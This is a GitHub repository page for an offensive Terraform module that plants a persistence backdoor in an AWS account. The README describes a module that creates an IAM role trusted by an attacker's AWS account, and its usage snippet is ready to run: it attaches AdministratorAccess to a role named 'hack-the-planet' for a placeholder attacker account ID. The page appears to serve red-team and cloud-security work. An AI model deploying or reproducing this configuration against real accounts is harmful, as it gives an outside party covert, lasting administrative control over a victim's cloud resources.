Skip to content
/ terraform-aws-cross-account-persistence Public

Offensive Terraform module which creates an IAM role with trust relationship with attacker's AWS account and attaches managed IAM Policy to an IAM role.

License

Apache-2.0 license
12 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

offensive-terraform/terraform-aws-cross-account-persistence

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
.github/workflows
.github/workflows
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
diagram.jpg
diagram.jpg
 
 
main.tf
main.tf
 
 
outputs.tf
outputs.tf
 
 
variables.tf
variables.tf
 
 

Repository files navigation

AWS Cross Account Persistence

OffensiveTerraform OffensiveTerraform OffensiveTerraform

Offensive Terraform module which creates an IAM role with trust relationship with attacker's AWS account and attaches managed IAM Policy to an IAM role.

Attack Diagram

Usage

module "cross-account-persistence" {
  source  = "offensive-terraform/cross-account-persistence/aws"

  role_name           = "hack-the-planet"
  policy_arn          = "arn:aws:iam::aws:policy/AdministratorAccess"
  attacker_account_id = "000000000000"
}

output "role_arn" {
  value = module.cross-account-persistence.role_arn
}

Author

Module managed by https://github.com/iganbold

About

Offensive Terraform module which creates an IAM role with trust relationship with attacker's AWS account and attaches managed IAM Policy to an IAM role.

Topics

aws cloud backdoor terraform persistence iam-role assume-role cloud-security offensiveterraform trust-relationship

Resources

Readme

License

Apache-2.0 license
Activity
Custom properties

Stars

12 stars

Watchers

3 watching

Forks

1 fork
Report repository

Releases 4

0.1.2 Latest
Sep 18, 2020
+ 3 releases

Packages

No packages published

Languages